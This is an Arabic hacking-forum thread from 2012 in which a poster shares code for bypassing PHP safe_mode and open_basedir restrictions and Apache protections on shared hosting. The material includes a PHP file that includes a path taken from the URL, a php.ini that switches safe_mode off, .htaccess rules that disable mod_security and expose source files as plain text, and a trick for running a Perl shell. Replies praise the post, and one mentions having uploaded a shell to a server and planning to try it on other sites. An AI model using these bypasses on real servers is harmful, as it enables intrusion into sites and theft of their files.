الفرق بين تخطي حمايات php و apache خطأ يقع فيه كثير من الهكرز

ReD-HaT · 12-31-2012, 05:01 AM

السلام عليكم و رحمة الله تعالى و بركاته
أنا جمعت بعض الأكواد ان شاء الله تفيدكم
هنالك فرق في التخطي
الأول هو التخطي السيف مود و يكون في اصدارات php
مثال هدا الكود في ini.php

كود PHP:

  <?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["file"]);

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include($_GET["ss"]);

?>

و كدلك ملف php.ini

كود PHP:

  short_open_tag = On

log_errors = On

log_errors_max_len = 1024

ignore_repeated_errors = On

register_globals = Off

magic_quotes_runtime = Off

magic_quotes_gpc = On

allow_url_fopen = on

AddHandler application/x-httpd-php4 .php

display_errors = Off

disable_functions = Bypass By ReD

safe_mode = Off

ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
لكن تتخطى في كثير من الأحيان
نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
نسوي هتاكسس و نشوف هدا الكود

كود PHP:

  <IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule> 

DirectoryIndex seees.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

AddType text/plain .pl

AddType text/plain .asp

AddType text/plain .htm

AddType text/plain .shtml

AddType text/plain .shtm

AddType text/plain .htaccess

Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

نجي نحلل هدا الهتاكسس
هدا بيتخطى كثير الفوربدن

كود PHP:

  Options all

DirectoryIndex Sux.html

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

أما بالنسبة ل 406 not acceptablr
فالحل هو هدا

كود PHP:

  <IfModule mod_security.c>

SecFilterEngine Off

SecFilterScanPOST Off

</IfModule>

أما Internal Server Error
فهدا الكود بيتخطاه

كود PHP:

  DirectoryIndex seees.html

Options +Indexes

AddType text/plain .php

AddHandler server-parsed .php

AddType text/plain .html

AddType text/plain .pl

AddType text/plain .asp

AddType text/plain .htm

AddType text/plain .shtml

AddType text/plain .shtm

AddType text/plain .htaccess

اه كمان شئ مهم
مثلا لو أريد تشغيل البيرل كمثال في السرفر
رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
مع انشاء ملف اخر بيرل يكون shellperl.red
ما الى هدا هناك طرق كثييييرة جدا في التخطي
و ارجو من الشباب التفريق ما بين هدان الأمرين
والله ولي التوفيق
سلام

Twi[L]ighT ,Victors ,خالد سعودي و 1 آخرون معجبون بهذا

المصدر: :: vBspiders Professional Network ::

hgtvr fdk jo'd plhdhj php , apache o'H dru tdi ;edv lk hgi;v.

GHOST HACKERS · 12-31-2012, 05:22 AM

بارك الله فيك .....................

hanoo · 12-31-2012, 06:33 AM

بارك الله فيك .. درس مهم

ABDOLINKIN · 12-31-2012, 06:11 PM

بارك الله فيك+++++++++

سفاح العنزي · 12-31-2012, 10:47 PM

بصراحة شرررح روعهه ومضمون أروع , أشكرك على هذا التنبيه

الله يوفقك شكراً

خالد سعودي · 01-01-2013, 02:15 AM

جاري الحفظ تسلم

GHOST HACK معجب بهذا

خالد سعودي · 01-01-2013, 04:18 AM

اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية

MaFia · 01-01-2013, 01:37 PM

بارك الله فيك
لكن ملحوظه صغيره في مشكلة

اقتباس


	Internal Server Error

اعتقد انها مش هتظبط على كل السيرفرات

لان الروت في الغالب\
بيمنع
option all
و
DirectoryIndex

ReD-HaT · 01-01-2013, 09:27 PM

اقتباس

المشاركة الأصلية كتبت بواسطة خالد سعودي


	اخي الكريم مانفع معي الطريقة في السيرفر عندي رفع عليه شل حتى البيرل ايشتغل معي ولكن بحربه في مواقع ثانية

والله ما فهمت قصدك وضح أكثر

ReD-HaT · 01-01-2013, 09:31 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Cyber Mafia


	بارك الله فيك لكن ملحوظه صغيره في مشكلة اعتقد انها مش هتظبط على كل السيرفرات لان الروت في الغالب\ بيمنع option all و DirectoryIndex